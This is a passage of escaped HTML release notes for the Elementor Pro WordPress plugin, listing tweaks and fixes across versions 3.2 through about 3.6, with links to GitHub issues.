href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5437\\\">#5437<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10617\\\">#10617<\\/a>)<\\/li>\\n<li>Tweak: Added Stroke functionality for typography control in various widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11158\\\">#11158<\\/a>)<\\/li>\\n<li>Tweak: Removed <code>elementor-section-wrap<\\/code> by adding it to the Optimized DOM Output experiment (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16950\\\">#16950<\\/a>)<\\/li>\\n<li>Tweak: Added style controls for variations in WooCommerce Menu Cart widget<\\/li>\\n<li>Tweak: Added color control to navigation dots in Media Carousel, Reviews, and Slides widgets<\\/li>\\n<li>Tweak: Disabled Vimeo autoplay on edit mode when getting video data in Video Playlist widget<\\/li>\\n<li>Tweak: Added notice about Facebook\'s new EU consent policy in Facebook Button, Facebook Comments, Facebook Embed, and Facebook Page widgets<\\/li>\\n<li>Tweak: Refactor string translation calls to use native WP translation methods<\\/li>\\n<li>Tweak: Convert <code>home_url<\\/code> license API call to <code>get_site_url<\\/code> for better compatibility<\\/li>\\n<li>Tweak: Promoted Default to New Theme Builder and Scroll Snap experiments to Stable status in Experiments screen<\\/li>\\n<li>Tweak: Scroll Snap experiment set to active by default for all websites in Experiments screen<\\/li>\\n<li>Tweak: Scrolling Effects in Header and Section backgrounds are not working as expected when effects are relative to the entire page<\\/li>\\n<li>Tweak: Added "Auto Updates" capability to Pro versions<\\/li>\\n<li>Tweak: Removed sequenced animation hover effect option from Classic skin in Call to Action widget<\\/li>\\n<li>Tweak: Added "Excerpt Length" control in Post Excerpt widget<\\/li>\\n<li>Tweak: Deleted deprecated methods from Query Control module<\\/li>\\n<li>Tweak: Adjusted Inline-CSS Experiment to work with Additional Custom Breakpoints experiment<\\/li>\\n<li>Fix: Automatically open cart functionality didn\'t work in product page in WooCommerce Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5921\\\">#5921<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16276\\\">#16276<\\/a>,<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16879\\\">#16879<\\/a>)<\\/li>\\n<li>Fix: Buttons are not visible when there are too many products in the cart in WooCommerce Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16221\\\">#16221<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17283\\\">#17283<\\/a>,<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16333\\\">#16333<\\/a>,<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13005\\\">#13005<\\/a>)<\\/li>\\n<li>Fix: Mini cart modal z-index is too low in WooCommerce Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16333\\\">#16333<\\/a>)<\\/li>\\n<li>Fix: Side cart buttons are not visible at first glance on mobile in WooCommerce Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16221\\\">#16221<\\/a>)<\\/li>\\n<li>Fix: Read More field recognizes inline HTML elements as plain text in Posts and Archive Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16985\\\">#16985<\\/a>)<\\/li>\\n<li>Fix: Load More functionality caused JS error console in Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17036\\\">#17036<\\/a>)<\\/li>\\n<li>Fix: Autoplay is not working as expected when the lazy load is active in Video Playlist widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15304\\\">#15304<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16274\\\">#16274<\\/a>)<\\/li>\\n<li>Fix: Right navigation area wasn\'t 100% clickable in Post Navigation widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14252\\\">#14252<\\/a>)<\\/li>\\n<li>Fix: Posts duplicate when there are two Posts widgets inside a page using pagination functionality (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17056\\\">#17056<\\/a>)<\\/li>\\n<li>Fix: Global widget changes are not reflected on frontend (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16820\\\">#16820<\\/a>)<\\/li>\\n<li>Fix: JS Error console message when using the Load More functionality and Post Per Page option in Posts widget<\\/li>\\n<li>Fix: Heading styling is not being loaded when Inline CSS experiment is active in Post and Page Title widgets<\\/li>\\n<li>Fix: Sticky offset not working as expected when changing device mode on the browser<\\/li>\\n<li>Fix: Scroll Snap functionality wasn\'t applied on Templates and Archives<\\/li>\\n<li>Fix: Toggle icon color didn\'t work on hover state when Inline Font Icons experiment is activated in Nav Menu widget<\\/li>\\n<li>Fix: Variations style controls are not working as expected in WooCommerce Add to Cart widget<\\/li>\\n<li>Fix: Display conditions module is not working as expected when using the new Theme Builder UI<\\/li>\\n<li>Fix: Edit header handles <code>z-index<\\/code> issues in Header document<\\/li>\\n<li>Fix: Panel icons UI glitch in Call To Action widget<\\/li>\\n<li>Fix: WordPress 5.9 <code>WP_User_query<\\/code> <code>who<\\/code> argument deprecation adjustments<\\/li>\\n<\\/ul>\\n<h4>3.5.2 - 2021-11-28<\\/h4>\\n<ul>\\n<li>Tweak: Adjusted license mechanism to support trial period<\\/li>\\n<li>Fix: Updates made to Global Widgets do not reflect accordingly to linked widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16815\\\">#16815<\\/a>)<\\/li>\\n<li>Fix: Hamburger toggle button doesn\'t change to \\u201cclose\\u201d when menu is collapsed in Nav Menu widget when Inline Font Awesome experiment is active<\\/li>\\n<li>Fix: Global Widget cannot be unlinked<\\/li>\\n<\\/ul>\\n<h4>3.5.1 - 2021-11-10<\\/h4>\\n<ul>\\n<li>Fix: Inline HTML elements appear as plain text in Animated Headline widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16816\\\">#16816<\\/a>)<\\/li>\\n<li>Fix: Dropdown items inherited values from Main Menu space between control in Nav Menu widget (<a href=\\\"(https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16815)\\\">#16815<\\/a><\\/li>\\n<li>Fix: Order Summary titles style controls not applying on various devices in Cart widget<\\/li>\\n<li>Fix: Panel "Need Help" link is not correct in WooCommerce section in Site Settings<\\/li>\\n<\\/ul>\\n<h4>3.5.0 - 2021-11-01<\\/h4>\\n<ul>\\n<li>New: WooCommerce Checkout widget - Fully customize the content and style of your checkout page (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15282\\\">#15282<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15990\\\">#15990<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11014\\\">#11014<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13218\\\">#13218<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5383\\\">#5383<\\/a>)<\\/li>\\n<li>New: WooCommerce Cart widget - Style your cart page the way you want with design flexibility (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15282\\\">#15282<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11014\\\">#11014<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13218\\\">#13218<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5383\\\">#5383<\\/a>)<\\/li>\\n<li>New: WooCommerce My Account widget - Create a custom design for your my account pages (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11014\\\">#11014<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5383\\\">#5383<\\/a>)<\\/li>\\n<li>New: Progress Tracker widget - Motivate your customers to keep reading your site content (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16576\\\">#16576<\\/a>)<\\/li>\\n<li>New: Meet WooCommerce Site Settings - Set your store pages within Elementor<\\/li>\\n<li>Experiment: Scroll Snap - Set the scene of every scroll (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10752\\\">#10752<\\/a>)<\\/li>\\n<li>Tweak: Changed infrastructure to prevent rendering bugs in Global Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16354\\\">#16354<\\/a>)<\\/li>\\n<li>Tweak: Added the option to open submission in a new tab in Form Submissions (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14967\\\">#14967<\\/a>)<\\/li>\\n<li>Tweak: Added various responsive controls in Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1851\\\">#1851<\\/a>)<\\/li>\\n<li>Tweak: Split Title and Price styling controls in Price List widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7688\\\">#7688<\\/a>)<\\/li>\\n<li>Tweak: Added various responsive capabilities to controls in Posts Archive widget<\\/li>\\n<li>Tweak: Adjusted Motion Effects module to support future feature<\\/li>\\n<li>Tweak: Changed admin notice content when Pro installed without Core installed<\\/li>\\n<li>Tweak: Cleanup in <code>wp_options<\\/code> table<\\/li>\\n<li>Tweak: Changed Connect logic in Elementor top bar to simplify the connect process<\\/li>\\n<li>Tweak: Marked new Theme Builder as an Experiment and set to default for new sites<\\/li>\\n<li>Tweak: Enforced better security policies in various widgets and modules<\\/li>\\n<li>Tweak: Added load more button functionality to the Posts Archive widget<\\/li>\\n<li>Tweak: Renamed Elementor\'s responsive SCSS variables<\\/li>\\n<li>Tweak: Added dividers to horizontal layout in Nav Menu widget<\\/li>\\n<li>Tweak: Removed Google+ social network from Share Buttons widget<\\/li>\\n<li>Tweak: Convert usage of old Responsive class to use the new Breakpoints Manager<\\/li>\\n<li>Fix: jQuery in Heading doesn\'t work for not logged in users in Custom Code (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14515\\\">#14515<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14266\\\">#14266<\\/a>)<\\/li>\\n<li>Fix: Menu animation causing page horizontal scroll in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15184\\\">#15184<\\/a>)<\\/li>\\n<li>Fix: Wrong function call in Table of Content & Post Excerpt widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16547\\\">#16547<\\/a>)<\\/li>\\n<li>Fix: Slides to Scroll control can\'t be set to Default if Widescreen mode has a value in Testimonial Carousel widget<\\/li>\\n<li>Fix: Sticky offset not working properly when changing device mode<\\/li>\\n<li>Fix: UTF character issues when exporting CSV file in Form Submissions<\\/li>\\n<li>Fix: Load More functionality doesn\'t work when the Posts widget placed inside an Archive template<\\/li>\\n<li>Fix: UI glitches and editing issues in Video Playlist widget<\\/li>\\n<\\/ul>\\n<h4>3.4.2 - 2021-10-12<\\/h4>\\n<ul>\\n<li>Fix: Icons color style conflicts when Font-Awesome Inline experiment is active in Share Buttons widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16435\\\">#16435<\\/a>)<\\/li>\\n<li>Fix: Mini Cart hides page content when closed in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16305\\\">#16305<\\/a>)<\\/li>\\n<li>Fix: UI glitches in the Editor edit mode when inserting Post Content widget and Font-Awesome Inline experiment is active in Single Post template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16358\\\">#16358<\\/a>)<\\/li>\\n<li>Fix: Slides per view controls disappeared from multiple breakpoints in Testimonial Carousel<\\/li>\\n<li>Fix: Product variations UI glitch in Menu Cart widget<\\/li>\\n<li>Fix: Buttons UI glitch on Safari browser in Menu Cart widget<\\/li>\\n<\\/ul>\\n<h4>3.4.1 - 2021-09-01<\\/h4>\\n<ul>\\n<li>Fix: Sticky functionality is not working if the Additional Custom Breakpoints experiment is active (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16186\\\">#16186<\\/a>)<\\/li>\\n<li>Fix: Slideshow skin UI glitch in Media Carousel widget<\\/li>\\n<li>Fix: Product price typography weight control is not working as expected in Menu Cart widget<\\/li>\\n<\\/ul>\\n<h4>3.4.0 - 2021-09-01<\\/h4>\\n<ul>\\n<li>Tweak: Added new Mini Cart layout type in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11312\\\">#11312<\\/a>)<\\/li>\\n<li>Tweak: Added styling options for Cart, Products, and Cart buttons in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14952\\\">#14952<\\/a>)<\\/li>\\n<li>Tweak: Added the ability to open cart automatically when an item is added in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14119\\\">#14119<\\/a>)<\\/li>\\n<li>Tweak: Added the ability to remove an item from cart without reloading the page with an AJAX request (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9531\\\">#9531<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10875\\\">#10875<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11309\\\">#11309<\\/a>)<\\/li>\\n<li>Tweak: Added Load More AJAX functionality to Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/12126\\\">#12126<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1284\\\">#1284<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14557\\\">#14557<\\/a>)<\\/li>\\n<li>Tweak: Added Vimeo support to the Video Playlist widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15319\\\">#15319<\\/a>)<\\/li>\\n<li>Tweak: Improved asset loading performance by serving lighter JS files (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8572\\\">#8572<\\/a>)<\\/li>\\n<li>Tweak: Added query string to the URL only after the first video is played in Video Playlist widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15348\\\">#15348<\\/a>)<\\/li>\\n<li>Tweak: Added various layout options with more responsive controls and cart structure options in Menu Cart widget<\\/li>\\n<li>Tweak: Added the option to open the menu cart by click or hover in Menu Cart widget<\\/li>\\n<li>Tweak: Added the ability to choose a specific product to draw data from in WooCommerce Dynamic tags<\\/li>\\n<li>Tweak: Removed auto-scroll to the widget location when arriving from external URL in Video Playlist widget<\\/li>\\n<li>Tweak: Removed the Video Playlist widget from the Experiments list<\\/li>\\n<li>Tweak: Added descriptive error messages for MailChimp action after submit and on form submit in Forms widget<\\/li>\\n<li>Tweak: Added tooltip trigger None and Hover for link in Hotspot widget<\\/li>\\n<li>Tweak: Added responsive controls to Offset and Effects Offset in Sticky options<\\/li>\\n<li>Tweak: Added responsive control to Alignment in Testimonial Carousel widget<\\/li>\\n<li>Tweak: Adjusted Motion Effects module to support future feature<\\/li>\\n<li>Tweak: Added future compatibility to support better loading of <code>eicons<\\/code> font<\\/li>\\n<li>Tweak: Changed Rename Part title and button color in Theme Builder<\\/li>\\n<li>Fix: Products don\'t appear on the cart while editing in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15451\\\">#15451<\\/a>)<\\/li>\\n<li>Fix: Videos always start muted in the Video Playlist widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15292\\\">#15292<\\/a>)<\\/li>\\n<li>Fix: Unnecessary spacing if submenu indicator is set to None in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15365\\\">#15365<\\/a>)<\\/li>\\n<li>Fix: MailChimp double opt-in feature doesn\'t work in Forms widget<\\/li>\\n<li>Fix: Fetching MailChimp groups field blocks the loading of the rest of the fields in the Form widget<\\/li>\\n<li>Fix: Missing field IDs causes forms not to be sent in Forms widget<\\/li>\\n<li>Fix: Full Content Skin is not working properly when inserted twice on the same page in Posts widget<\\/li>\\n<li>Fix: Avoid Duplicates option doesn\'t exclude manual selections in Posts widget<\\/li>\\n<li>Fix: Submenu indicator alignment issue in Nav menu widget<\\/li>\\n<li>Fix: Query control deprecated message appears when debug mode is defined<\\/li>\\n<li>Fix: Tweet Button icon incorrect color and size when the icon is rendered as SVG in Blockquote widget<\\/li>\\n<li>Fix: Video icon size is not changing on Active state in Video Playlist widget<\\/li>\\n<li>Fix: Header icon color is not working in Table Of Content widget<\\/li>\\n<li>Fix: Icons style glitches when Font Awesome Inline experiment is active in Video Playlist widget<\\/li>\\n<li>Fix: Bullet markers are not visible on preview mode when Font Awesome Inline experiment is active in Table of Content widget<\\/li>\\n<li>Fix: UI Glitch when Font-Awesome Inline experiment is active in Price Table widget<\\/li>\\n<li>Fix: Submenu Indicator appears larger when Font Awesome Inline experiment is active in Nav Menu widget<\\/li>\\n<li>Fix: Part name is deleted when clicking on the "Change" Button without changing the name in Theme Builder<\\/li>\\n<li>Fix: Redundant pagination queries in the Editor<\\/li>\\n<li>Deprecated: Remove all usages of <code>ElementorUtils::get_create_new_post_url()<\\/code><\\/li>\\n<li>Deprecated: See all deprecations to this version in our <a href=\\\"https:\\/\\/developers.elementor.com\\/v3-4-planned-deprecations\\/\\\">Developers Deprecations Post<\\/a><\\/li>\\n<\\/ul>\\n<h4>3.3.8 - 2021-08-23<\\/h4>\\n<ul>\\n<li>Fix: Products grid width issue when adjusting columns and rows in Products widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16001\\\">#16001<\\/a>)<\\/li>\\n<li>Fix: Font Awesome Inline experiment causes icons glitch in Price Table widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16045\\\">#16045<\\/a>)<\\/li>\\n<li>Fix: reCAPTCHA v3 <code>z-index<\\/code> is lower than the Section\'s background color<\\/li>\\n<li>Fix: Style missing when Font Awesome inline experiment is active in Post Info widget<\\/li>\\n<li>Fix: Font Awesome icons were not loaded in Post Info widget<\\/li>\\n<li>Fix: Zero character can\'t be used as a placeholder in Number field in Form widget<\\/li>\\n<li>Fix: Carousels are not working properly in the Editor when Additional Custom Breakpoints experiment is active<\\/li>\\n<\\/ul>\\n<h4>3.3.7 - 2021-08-15<\\/h4>\\n<ul>\\n<li>Tweak: Added support for Additional Custom Breakpoints in Nav Menu widget<\\/li>\\n<li>Tweak: Added support for Additional Custom breakpoints in Motion Effects<\\/li>\\n<li>Fix: Columns didn\'t respond to changes in Gallery widget if Additional Custom Breakpoints Experiment is active<\\/li>\\n<\\/ul>\\n<h4>3.3.6 - 2021-08-10<\\/h4>\\n<ul>\\n<li>Tweak: Added support for future feature in Nav Menu widget<\\/li>\\n<li>Fix: WooCommerce responsive grid styles are not being reflected in Product Related widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15857\\\">#15857<\\/a>)<\\/li>\\n<li>Fix: WooCommerce responsive grid styles are not being reflected in Upsells widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15857\\\">#15857<\\/a>)<\\/li>\\n<li>Fix: WooCommerce responsive grid styles are not being reflected in Product Categories widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15857\\\">#15857<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.3.5 - 2021-08-01<\\/h4>\\n<ul>\\n<li>Fix: Responsive layout glitches in Products and Products Archive widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15773\\\">#15773<\\/a>)<\\/li>\\n<li>Fix: reCAPTCHA V3 integration conflict with required fields validation in Forms widget<\\/li>\\n<\\/ul>\\n<h4>3.3.4 - 2021-07-21<\\/h4>\\n<ul>\\n<li>Fix: Grid layout glitch in WooCommerce Products Archive widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15718\\\">#15718<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.3.3 - 2021-07-20<\\/h4>\\n<ul>\\n<li>Tweak: Added a descriptive message in Collect Submissions action after submit<\\/li>\\n<li>Tweak: Added future compatibility for Additional Custom Breakpoints for Pro widgets<\\/li>\\n<li>Fix: Some widget style breaks when Improved CSS Loading Experiment is active in certain cases (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15632\\\">#15632<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15683\\\">#15683<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15660\\\">#15660<\\/a>)<\\/li>\\n<li>Fix: Translation update keep appearing as available after install (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14297\\\">#14297<\\/a>)<\\/li>\\n<li>Fix: Wrong default icon color when using Font Awesome icons as inline SVG in Call to Action widget<\\/li>\\n<\\/ul>\\n<h4>3.3.2 - 2021-07-13<\\/h4>\\n<ul>\\n<li>Tweak: Updated plugin description<\\/li>\\n<li>Fix: MailChimp tags in form widget replaced existing tags (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11111\\\">#11111<\\/a>)<\\/li>\\n<li>Fix: Clicking videos from the items list in edit mode doesn\\u2019t initiate videos properly<\\/li>\\n<li>Fix: User unauthorized message when activated but not connected in Kit Library<\\/li>\\n<li>Fix: Carousel widgets did not support additional custom breakpoint responsive values<\\/li>\\n<li>Fix: Tab border is overridden by the Section background color in Video Playlist widget<\\/li>\\n<li>Fix: Widgets style breaks when Improved CSS Load experiment is active in a Single Page template and Post Content widget<\\/li>\\n<\\/ul>\\n<h4>3.3.1 - 2021-06-20<\\/h4>\\n<ul>\\n<li>Tweak: Added support for more Theme Builder display conditions in Export \\/ Import experiment<\\/li>\\n<li>Tweak: Adjusted License page heading structure for future feature<\\/li>\\n<li>Tweak: Adjusted Font Awesome icon for allowing support for future feature<\\/li>\\n<li>Fix: <code>frontend.min.js<\\/code> file size increased in Elementor Pro 3.3.0 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15278\\\">#15278<\\/a>)<\\/li>\\n<li>Fix: Prevent conditions from being reset when object cache is enabled in site (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13299\\\">#13299<\\/a>)<\\/li>\\n<li>Fix: Custom Code publish modal responsiveness issues (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14519\\\">#14519<\\/a>)<\\/li>\\n<li>Fix: Populating fields with options programmatically doesn\'t appear in Submissions screen (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10671\\\">#10671<\\/a>)<\\/li>\\n<li>Fix: Large images are not shown on the Image Carousel widget when set via Toolset dynamic tag<\\/li>\\n<li>Fix: Enable inline editing to the inner content tabs in Video Playlist widget<\\/li>\\n<li>Fix: Clicking on the video list doesn\'t play videos properly in Video Playlist widget<\\/li>\\n<li>Fix: Hide Play Icon control when Image overlay is toggled off in Video Playlist widget<\\/li>\\n<li>Fix: Removed extra space below the player when viewing from mobile view in Video Playlist widget<\\/li>\\n<li>Fix: Import button is not working properly in Theme Builder interface<\\/li>\\n<li>Fix: Preview Dynamic Content as control is not updating preview and throws an error in Popup Builder<\\/li>\\n<\\/ul>\\n<h4>3.3.0 - 2021-06-08<\\/h4>\\n<ul>\\n<li>New: Video Playlist widget - Add Engaging Video Content to Your Website (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11859\\\">#11859<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7803\\\">#7803<\\/a>)<\\/li>\\n<li>New: Hotspot widget - Create Interactive Images With Contextually Relevant Information (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7282\\\">#7282<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2768\\\">#2768<\\/a>)<\\/li>\\n<li>Tweak: Accessibility improvements for sub-menus in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13859\\\">#13859<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13810\\\">#13810<\\/a>)<\\/li>\\n<li>Tweak: MailChimp action after submit can now add new tags to existing subscribers in Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11111\\\">#11111<\\/a>)<\\/li>\\n<li>Tweak: Added <code>elementor_pro\\/forms\\/record\\/actions_before<\\/code> to filter the record before it sent to Actions After Submit in Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14261\\\">#14261<\\/a>)<\\/li>\\n<li>Tweak: Yoast SEO breadcrumbs widget can be used in Elementor without the need of enabling them in Yoast setting<\\/li>\\n<li>Tweak: Added future support for widgets CSS conditional loading (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10329\\\">#10329<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14229\\\">#14229<\\/a>)<\\/li>\\n<li>Tweak: Added future support for Sticky JS library conditional loading<\\/li>\\n<li>Tweak: Added future support for Import \\/ Export experiment<\\/li>\\n<li>Tweak: Preparations and fixes for Import Export Experiment in Pro version<\\/li>\\n<li>Tweak: Added gradient button capabilities to Login widget buttons<\\/li>\\n<li>Tweak: Added gradient button capabilities to Slides widget button<\\/li>\\n<li>Tweak: Added gradient button capabilities to Price Table widget button<\\/li>\\n<li>Tweak: Added gradient button capabilities to Flip Box widget button<\\/li>\\n<li>Tweak: Added Code Highlight widget Developers Documentation<\\/li>\\n<li>Tweak: Adjusted Submissions page for future updates<\\/li>\\n<li>Tweak: Added <code>em<\\/code> and <code>%<\\/code> units for padding control in Carousel widgets<\\/li>\\n<li>Tweak: Shorten currency name to currency symbol in PayPal button widget<\\/li>\\n<li>Fix: Custom Fonts URLs should be replaced when replace URL is triggered (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7376\\\">#7376<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10382\\\">#10382<\\/a>)<\\/li>\\n<li>Fix: The currency symbol size changed in the Price Table widget if enabling sale (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13519\\\">#13519<\\/a>)<\\/li>\\n<li>Fix: Nav Menu widget is not loading Font Awesome submenu icons (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9907\\\">#9907<\\/a>)<\\/li>\\n<li>Fix: Hamburger toggle is not working in Nav menu widget<\\/li>\\n<li>Fix: Activation bug for IDN domains<\\/li>\\n<li>Fix: Conditions modal responsive glitches in Custom Code<\\/li>\\n<li>Fix: Duplicated strings in Custom Code module<\\/li>\\n<li>Fix: Enable resize option for code input field in Custom Code<\\/li>\\n<li>Fix: \\u201cSave & Close \\u201cbutton in Custom Code\'s Conditions modal was not visible on small screen sizes<\\/li>\\n<li>Fix: Removing a column from a section in the navigator resulted in an empty section<\\/li>\\n<li>Fix: Recommend option is cut If the layout is not "Standard" in the Facebook Button widget<\\/li>\\n<li>Fix: Video item does not play without adding an image in Media Carousel widget<\\/li>\\n<li>Fix: <code>search-plus<\\/code> icon missing from panel in Media Carousel widget<\\/li>\\n<li>Fix: UI hover state glitch in Media Carousel widget<\\/li>\\n<li>Fix: PHP notice was thrown when trying to import a kit without overrideConditions parameter in Kit Import flow<\\/li>\\n<li>Fix: Templates conditions not imported if there are no conflicts in Import Export Experiment<\\/li>\\n<li>Fix: Non english values are not encoded properly on Submissions export<\\/li>\\n<li>Fix: Theme Builder import is not working properly<\\/li>\\n<li>Fix: UI glitch when no global widgets were found in Editor Panel<\\/li>\\n<li>Deprecated: See all deprecations to this version in our <a href=\\\"https:\\/\\/developers.elementor.com\\/v3-3-planned-deprecations\\/\\\">Developers Deprecations Post<\\/a><\\/li>\\n<\\/ul>\\n<h4>3.2.2 - 2021-05-05<\\/h4>\\n<ul>\\n<li>Tweak: Added support for Expert tier templates in Templates Library<\\/li>\\n<li>Tweak: Updated compatibility tag to support Elementor v3.2.x<\\/li>\\n<li>Tweak: Added compatibility for future Library improvements<\\/li>\\n<li>Fix: Toolset image dynamic field is not working with Gallery widget<\\/li>\\n<\\/ul>\\n<h4>3.2.1 - 2021-03-21<\\/h4>\\n<ul>\\n<li>Tweak: Added strings context in PayPal button and Price Table widgets<\\/li>\\n<li>Tweak: Added support for future Import \\/ Export Kit feature<\\/li>\\n<li>Fix: Submissions with over than 191 characters weren\'t indexed properly<\\/li>\\n<\\/ul>\\n<h4>3.2.0 - 2021-03-14<\\/h4>\\n<ul>\\n<li>New: PayPal Button widget - Collect PayPal payments directly from your site<\\/li>\\n<li>Experiment: Submissions - Save all of your form submissions in one place (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1686\\\">#1686<\\/a>)<\\/li>\\n<li>Tweak: Added Stay In Column option to Inner Section element (<a 